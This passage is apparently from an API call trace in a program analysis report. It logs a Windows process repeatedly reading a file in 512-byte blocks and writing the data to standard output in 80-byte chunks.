hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] GetFileType (hFile=0x4c) returned 0x1 [0107.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.114] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.115] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] GetFileType (hFile=0x4c) returned 0x1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.115] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.115] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.116] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, 
lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] GetFileType (hFile=0x4c) returned 0x1 [0107.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.116] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.117] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 
0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] GetFileType (hFile=0x4c) returned 0x1 [0107.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.117] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.118] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.118] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) 
returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] GetFileType (hFile=0x4c) returned 0x1 [0107.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.118] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.124] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.124] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.125] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] GetFileType (hFile=0x4c) returned 0x1 [0107.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.125] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.126] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.126] ReadFile 
(in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] GetFileType (hFile=0x4c) returned 0x1 [0107.126] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.126] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.127] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] GetFileType (hFile=0x4c) returned 0x1 [0107.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.127] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, 
